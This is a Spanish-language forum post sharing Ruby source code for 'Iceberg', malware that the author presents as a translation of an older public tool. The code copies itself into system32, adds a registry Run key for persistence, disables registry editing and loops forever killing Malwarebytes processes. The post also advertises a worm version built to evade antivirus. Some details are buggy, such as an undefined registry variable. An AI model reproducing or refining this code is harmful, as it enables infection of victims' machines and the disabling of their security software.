Para recordar viejos tiempos , pasar un buen rato y practicar un poco he codeado un ejemplo de iceberg asi como el version publica que se publico hace un (mucho) tiempo.

Advertencia : Esta version del Iceberg es una SIMPLE TRADUCCION de Iceberg Tool Generator Public Version
Lo que significa que no es capaz de evadir a los Antivirus mas actualizados asi como Kaspersky o Nod 32
Para evadirlos existe el Iceberg worm que estan desarrollando Velario y Slore -> [Tienes que estar registrado y conectado para ver este vínculo]

Código:

# Coded by Sanko

require "win32ole"
require 'win32/registry'
require 'ftools'

def killprocess(process)
    require "win32ole"
    var = WIN32OLE.connect("winmgmts://")
    kill = var.ExecQuery("select * from Win32_process where name='#{process}'")
    kill.each do |proceso|
        proceso.Terminate
    end
end

def deshabilitarreg()
    system('REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /F')
end

def deshabilitartaskman()
    system('REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 0 /F')
end

def autocopy()
    File.copy('Iceberg.exe', 'C:\WINDOWS\system32\iceberg.exe')
end

def registrar()
    runrute = 'Software\Microsoft\Windows\CurrentVersion\Run'
    folderkey = 'iceberg'
    Win32::Registry::HKEY_CURRENT_USER.open(Run_branch , Win32::Registry::Constants::KEY_ALL_ACCESS) do |reg|
        reg[folderkey] = 'C:\WINDOWS\system32\iceberg.exe'
    end
    autocopy()
    deshabilitarreg()
    deshabilitartaskman()
end

def autokill()
    killprocess('mbam.exe')
    killprocess('mbamgui.exe')
    killprocess('mbampt.exe')
    killprocess('mbamscheduler.exe')
    killprocess('mbamservice.exe')
    killprocess('mbam-chamaleon.exe')
    killprocess('mbam-killer.exe')
end

def main()
    var = 0
    registrar()
    while var < 10
        autokill()
    end
end

main()

Saludos...